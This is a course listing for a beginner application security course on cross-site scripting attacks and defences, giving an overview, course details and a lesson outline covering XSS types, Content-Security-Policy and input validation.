Learning Path: Application Security Essentials

Attacking and Defending Cross-Site Scripting (XSS)

Client-side attacks are totally different from server-side ones, because they rely on the attack being initiated from the user’s device. It creates a whole new set of problems for security teams to deal with, and developers need to change their remediation strategies, too. 

In this course, we take an exclusive look at Cross-Site Scripting (XSS) attacks, and why they’re such a big deal. We start with an introduction to client-side attacks, and how they evolved from the time of MySpace malware. You’ll learn about the different kinds of the XSS attacks as well as the most popular strategies and exploits used by attackers. 

In the next couple of modules, we take the help of hands-on lab exercises to simulate and run XSS attacks on applications. We follow this up with a defensive countermeasure using tried-and-tested methods for securing apps against these attacks. 

A majority of your learning will be done practically, using labs to simulate realistic environments. This gives you an opportunity to  learn first-hand the actual AppSec strategies you’ll be using to secure web applications. By the end of this course, you’ll have an in-depth, hands-on knowledge of how Cross-Site Scripting works, and how to deal with real-world attack scenarios.

Proficiency: Beginner
Graphical icon for XXE, Insecure deserialization courses
Audience: Application Security
 Course Duration: 4 hours
19 lessons
5 Cloud Labs

Course Outline

  • Course Introduction
  • Course Pre-requisites
  • XSS – Introduction and Overview
  • XSS – Types of Attacks
  • Popular XSS Attacks
  • Content-Security-Policy: An Introduction
  • Bypassing Content-Security-Policy
  • Advanced Controls: Content-Security-Policy
  • Introduction to Input Validation
  • Validation Approaches – Part 1
  • Validation Approaches – Part 2
  • Validation Serialized Datasets: JSON